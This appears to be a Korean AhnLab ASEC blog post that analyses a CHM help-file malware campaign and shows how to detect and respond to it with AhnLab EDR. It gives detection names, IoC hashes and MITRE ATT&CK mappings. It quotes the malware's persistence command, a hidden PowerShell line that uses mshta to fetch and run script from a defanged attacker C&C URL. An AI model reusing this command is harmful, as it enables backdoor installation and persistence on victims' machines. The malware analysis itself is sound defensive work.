Posted By ,

EDR을 활용한 CHM 악성코드 추적

AhnLab Security Emergency response Center(ASEC)은 최근 CHM(Compiled HTML Help File)을 이용한 APT 공격 사례를 공개하였다.

패스워드 파일로 위장하여 유포 중인 악성코드 – ASEC BLOG
AhnLab Security Emergency response Center(ASEC)은 지난 달 패스워드 파일로 위장하여 정상 문서 파일과 함께 압축 파일로 유포되는 악성코드를 확인하였다. 해당 유형의 악성코드는 정상 문서 파일을 함께 유포함으로써 사용자가 악성 파일임을 알아채기 어렵다. 최근 확인된 악성코드는 CHM과 LNK 형식으로, CHM의 경우 아래에 소개한 악성코드와 동일한 유형으로 같은 공격 그룹에서 제작한 것으로 보인다. CHM과 LNK 파일은 모두 암호가 설정된 정상 문서 파일과 함께 압축되어 유포된 것으로 추정된…

CHM은 HTML 형식의 도움말 파일이며 HTML 파일을 내부에 포함하므로 공격자는 악의적인 스크립트 코드를 HTML에 삽입할 수 있다. 삽입된 스크립트는 운영체제 기본 응용 프로그램인 hh.exe를 통해 실행된다. 이처럼 공격자가 서명되어 있거나 운영체제에 기본으로 설치된 프로그램을 통해 악성코드를 실행하는 기법을 MITRE ATT&CK에서는 T1218 (System Binary Proxy Execution)이라 명명하였다. MITRE에서는 공격자가 T1218 기법을 이용하여 악성코드를 실행할 경우 서명된 바이너리 혹은 MS 기본 프로그램에서 악성코드가 실행되기 때문에 프로세스 및 시그니처 기반의 탐지를 쉽게 우회할 수 있다고 소개하고 있다.

[그림 1] hh.exe 파일 속성 정보

이번에 ASEC에서 확인한 CHM 악성코드는 mshta.exe를 통해 파워쉘을 실행하는 악성 스크립트([그림 2])를 공격자 서버로부터 다운로드 받아 실행한다.

[그림 2] 공격자 서버에서 다운로드되는 스크립트

[그림 2]에서 최종적으로 실행되는 파워쉘 스크립트는 공격자 C&C 서버로부터 명령 수행 및 지속성 유지를 위한 레지스트리 Run키에 명령어를 등록한다.

레지스트리 Run키 등록 명령어 (지속성 유지)
c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 2.2.2.2 || mshta hxxp://shacc[.]kr/skin/product/1.html

아래 [그림 3]은 안랩 EDR(Endpoint Detection and Response) 제품에서 보여지는 이메일의 첨부 파일 형태로 실행된 CHM 위협의 프로세스 트리 정보이다.

[그림 3] 안랩 EDR 제품 프로세스 트리 화면 (CHM 위협)

안랩 EDR 제품에서는 CHM 유형의 악성코드 위협에 대해 행위 정보 기록과 탐지를 하고 있다. 따라서 EDR 운영 담당자는 EDR 이력 검색을 통해 사내 인프라에 CHM 유형 악성코드 관련 위협이 있는지 확인할 수 있다.

  • CHM 위협 기록 확인 방법 : 이벤트 -> EDR 행위 -> 기간 설정 -> EDR 위협 검색 (hh.exe)
[그림 4] 안랩 EDR 행위 이력 확인 (hh.exe가 mshta 프로세스 생성 탐지)

다음은 안랩 EDR 분석 화면에서 확인할 수 있는 CHM 관련 위협 정보이다.

[MITRE ATT&CK 정보]

[그림 5] MITRE ATT&CK 정보 (T1218.001 -> hh.exe가 mshta.exe 실행 행위 탐지)
[그림 6] MITRE ATT&CK 정보 (T1547 -> 자동 실행 레지스트리 Run키 등록 행위 탐지)

이번에 확인된 CHM 악성코드 위협은 최종적으로 파워쉘 형태의 백도어가 실행되고 지속성 유지를 위한 자동 실행 레지스트리 Run키 등록 행위를 수행한다. EDR 운영 담당자는 EDR을 통해서 [그림 5]와 같이 공격자 C&C 서버 주소 정보와 [그림 6]의 자동 실행 레지스트리 Run키 등록 정보를 확인하여 위협을 제거할 수 있다.

또한 EDR 콘솔의 [분석] – [위협] 탭에서 탐지된 위협에 대해 [그림 7]과 같이 “대응하기” 버튼을 눌러 조치를 할 수 있다. 해당 기능은 프로세스에 대한 조치를 취할 수 있는 기능으로써 프로세스 종료 뿐만 아니라 파일 수집 기능을 지원한다. 그리고 침해를 당한 호스트 PC에 대해서도 EDR에서는 [그림 8]과 같이 네트워크 격리 조치 기능을 지원하여 내부 확산(Lateral Movement) 및 공격자 명령 수행 등 추가 피해를 예방할 수 있다.

[그림 7] 위협 프로세스에 대한 대응
[그림 8] 피해 호스트 PC에 대한 대응

안랩 V3, EDR 제품에서는 CHM 위협에 대해 아래 진단명으로 탐지하고 있다.

[파일 진단]
Trojan/CHM.Agent (2023.03.08.03)
Backdoor/Powershell.Generic.SC187227 (2023.03.21.00)

[행위 진단]
SystemManipulation/EDR.AutoRun.M3833
Execution/EDR.Mshta.M10996

[IoC]
[CHM]
809528921de39530de59e3793d74af98


[PowerShell]
32445d05dd1348bce9b6a395b2f8fbd8

[C&C]
hxxp://shacc[.]kr/skin/product/1.html

CHM 위협 관련 MITRE ATT&CK 매핑은 다음과 같다.
T1218.001 System Binary Proxy Execution: Compiled HTML File
T1547 Boot or Logon Autostart Execution

행위 정보 탐지 및 분석을 통한 엔드포인트 가시성을 제공하고 위협을 능동적으로 추적하는 AhnLab EDR에 대한 자세한 정보는 안랩닷컴에서 확인이 가능하다.

Categories:안랩 탐지

Tagged as:,,

0 0 votes
별점 주기
Subscribe
Notify of
guest

0 댓글
Inline Feedbacks
View all comments